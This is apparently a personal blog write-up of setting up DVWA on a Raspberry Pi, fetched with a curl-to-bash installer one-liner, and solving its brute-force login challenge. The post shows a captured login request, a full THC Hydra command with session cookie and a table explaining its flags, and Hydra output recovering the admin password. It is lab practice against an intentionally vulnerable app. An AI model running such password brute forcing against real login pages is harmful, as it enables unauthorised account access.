2024-12-12 DVWA challenge 1 ============================= .. post:: Feb 12, 2024 :category: Hacking, Networks :tags: networks, network security, bruteforcing, web security, webapp penstesting :author: ccli :language: en I finally decided that today would be the day I put my RPI to actual use. I decided on hosting my on DVWA (Damn Vulnerable Web Application) to practice some basic web-app pentesting techniques, here's how it went. Setup ------ The initial setup of DVWA was fairly typical for any linux application however I had a few painful areas to get through. Originally I decided to clone the DVWA repository to my host machine and copy the file over: .. code-block:: clojure scp -r /home/j/DVWA j@10.x.x.x:/home/j/DVWA Then ran the following commands to (hopefully) download any dependencies: .. code-block:: clojure sudo apt update Which instantly failed, after about 30 minutes of debugging I found that adding the us APT mirror fixed the issue, anyways back on topic. I attempted to start apache but ran into quite a few configuration and PATH issues. Every time I fixed one error another would seemingly appear out of nowhere, at this point I decided that my current setup was beyond repair so I rm -rf'd any apache related directories hoping a fresh install would help. With my system clean of any previous bugs I decided that the best way to get this working would be to SSH into my rPi and run the setup oneliner they posted on their github: .. code-block:: clojure sudo bash -c "$(curl --fail --show-error --silent --location https://raw.githubusercontent.com/IamCarron/DVWA-Script/main/Install-DVWA.sh)" This script handled all of the installation perfectly and by running: .. code-block:: clojure sudo apache2 Along with some extra mysql configuration I successfully started DVWA on my rPi and can now access it from my main computer. Now that I am able to navigate to `10.x.x.x.x:xxxx/DVWA` I can start testing the site. Challenge 1: Brute force ------------------------- Note: This challenge was done on "easy" mode. Credits: I used `This article `_ as a general guide. The first thing I did for this challenge was open BurpSuite. I wanted to see what requests were being made when I attempted a login, any form of recon like this is essential to create a mind map of a system. Here is my first test. I started by running a burpsuite browser proxy and attempted a login with j:j. I copied the request and its response to get a better idea of what's happening under the hood: .. code-block:: clojure curl --path-as-is -i -s -k -X $'GET' \ -H $'Host: 10.0.0.100:8898' -H $'Accept-Language: en-US,en;q=0.9' \ -H $'Upgrade-Insecure-Requests: 1' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36' \ -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' \ -H $'Referer: http://10.0.0.100:8898/DVWA/vulnerabilities/brute/?username=&password=&Login=Login' \ -H $'Accept-Encoding: gzip, deflate, br' -H $'Connection: keep-alive' \ -b $'PHPSESSID=6uegn0i91ebjsi55eenm6kkgel; security=low' \ $'http://10.0.0.100:8898/DVWA/vulnerabilities/brute/?username=j&password=j&Login=Login' HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 00:31:38 GMT Server: Apache/2.4.59 (Raspbian) Expires: Tue, 23 Jun 2009 12:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 1406 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html;charset=utf-8 Breaking this down we can see when we attempt to login it sends an HTTP GET request to my DVWA server passing the username and password as URL parameters, in this case, you can see my username: `?username=j` and my password `?password=j`. With this knowledge we can try to perform a brute force by modifying these URL parameters. For this, I will use `THC Hydra `_. After a few hours of suffering (at least I can say I have experience with hydra now...) I finally managed to successfully brute force the password, here was the final command: .. code-block:: clojure hydra -l admin -P ~/Documents/tools/lists/DVWA-PW-1.txt http-get-form:"//10.x.x.x:xxxx/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie:security=low;PHPSESSID=7jnr60dnenvsmqabg1fcemm14h:Username and/or password incorrect" -V To break this down: +-------------------------------+---------------------------------------------------+ | Command | Explanation | +-------------------------------+--------------------------------------------------+ | -l admin | Set username to "admin" | | -P .../lists/DVWA-PW-1.txt | Set the password to this list's contents | | http-get-form ... | Target HTTP GET form | | username=^USER^&password=^PASS^ | Set the username and passwords to previously | | | assigned values (or files) | | Cookie:security=low | Cookie security option | | PHPSESSID | Session ID (to skip authentication) | | -V | Verbose | +-------------------------------+--------------------------------------------------+ And its output: .. code-block:: clojure [ATTEMPT] target 10.0.0.100 - login "admin" - pass "" - 1 of 22 [child 0] (0/0) [ATTEMPT] target 10.0.0.100 - login "admin" - pass "admin" - 2 of 22 [child 1] (0/0) [ATTEMPT] target 10.0.0.100 - login "admin" - pass "123456" - 3 of 22 [child 2] (0/0) [ATTEMPT] target 10.0.0.100 - login "admin" - pass "root" - 4 of 22 [child 3] (0/0) [ATTEMPT] target 10.0.0.100 - login "admin" - pass "toor" - 5 of 22 [child 4] (0/0) [ATTEMPT] target 10.0.0.100 - login "admin" - pass "guest" - 6 of 22 [child 5] (0/0) [ATTEMPT] target 10.0.0.100 - login "admin" - pass "user" - 7 of 22 [child 6] (0/0) [ATTEMPT] target 10.0.0.100 - login "admin" - pass "welcome" - 8 of 22 [child 7] (0/0) [ATTEMPT] target 10.0.0.100 - login "admin" - pass "qwerty" - 9 of 22 [child 8] (0/0) [ATTEMPT] target 10.0.0.100 - login "admin" - pass "letmein" - 10 of 22 [child 9] (0/0) [ATTEMPT] target 10.0.0.100 - login "admin" - pass "monkey" - 11 of 22 [child 10] (0/0) [ATTEMPT] target 10.0.0.100 - login "admin" - pass "admin123" - 12 of 22 [child 11] (0/0) [ATTEMPT] target 10.0.0.100 - login "admin" - pass "letmein123" - 13 of 22 [child 12] (0/0) [ATTEMPT] target 10.0.0.100 - login "admin" - pass "password123" - 14 of 22 [child 13] (0/0) [ATTEMPT] target 10.0.0.100 - login "admin" - pass "admin1234" - 15 of 22 [child 14] (0/0) [ATTEMPT] target 10.0.0.100 - login "admin" - pass "secret" - 16 of 22 [child 15] (0/0) [ATTEMPT] target 10.0.0.100 - login "admin" - pass "test123" - 17 of 22 [child 0] (0/0) [ATTEMPT] target 10.0.0.100 - login "admin" - pass "passw0rd" - 18 of 22 [child 1] (0/0) [ATTEMPT] target 10.0.0.100 - login "admin" - pass "summer" - 19 of 22 [child 2] (0/0) [ATTEMPT] target 10.0.0.100 - login "admin" - pass "football" - 20 of 22 [child 3] (0/0) [ATTEMPT] target 10.0.0.100 - login "admin" - pass "password1234" - 21 of 22 [child 10] (0/0) [ATTEMPT] target 10.0.0.100 - login "admin" - pass "password" - 22 of 22 [child 5] (0/0) [8898][http-get-form] host: 10.0.0.100 login: admin password: password 1 of 1 target successfully completed, 1 valid password found Conclusion ---------- Although the setup and debugging was pretty frustrating I really enjoyed this lab when it was complete since I've had minimal experience with both brute-forcing and cookie manipulation.